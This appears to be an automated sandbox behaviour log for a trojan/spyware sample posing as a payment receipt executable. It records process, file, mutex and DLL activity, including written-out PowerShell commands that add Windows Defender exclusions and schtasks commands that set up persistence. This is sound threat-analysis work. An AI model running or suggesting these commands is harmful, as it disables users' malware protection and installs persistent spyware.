                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GikDqR6g4UGrEltCUX.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GikDqR6g4UGrEltCUX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@15/9
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeFile created: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMutant created: \Sessions\1\BaseNamedObjects\PwlChGsSWOKVlCIsnundQHs
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3A9E.tmpJump to behavior
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PAYMENT RECEIPT_USD21,000.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000000.2030935576.0000000000962000.00000002.00000001.01000000.00000003.sdmp, fttQgpyzkkc.exe.0.drBinary or memory string: INSERT INTO [dbo].[Table] ([Id], [Nume], [Grupa_muschi], [Data_livrare], [Pret]) VALUES (@Id, @Nume, @Grupa_muschi, @Data_livrare, @Pret);
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000000.2030935576.0000000000962000.00000002.00000001.01000000.00000003.sdmp, fttQgpyzkkc.exe.0.drBinary or memory string: UPDATE [dbo].[Table] SET [Id] = @Id, [Nume] = @Nume, [Grupa_muschi] = @Grupa_muschi, [Data_livrare] = @Data_livrare, [Pret] = @Pret WHERE (([Id] = @Original_Id) AND ([Nume] = @Original_Nume) AND ([Grupa_muschi] = @Original_Grupa_muschi) AND ([Data_livrare] = @Original_Data_livrare) AND ([Pret] = @Original_Pret));
                Source: wlanext.exe, 00000011.00000003.2462226374.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2459785986.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2459674007.0000000003492000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.00000000034DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PAYMENT RECEIPT_USD21,000.exeReversingLabs: Detection: 36%
                Source: PAYMENT RECEIPT_USD21,000.exeVirustotal: Detection: 44%
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeFile read: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
                Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: profapi.dllJump to behavior
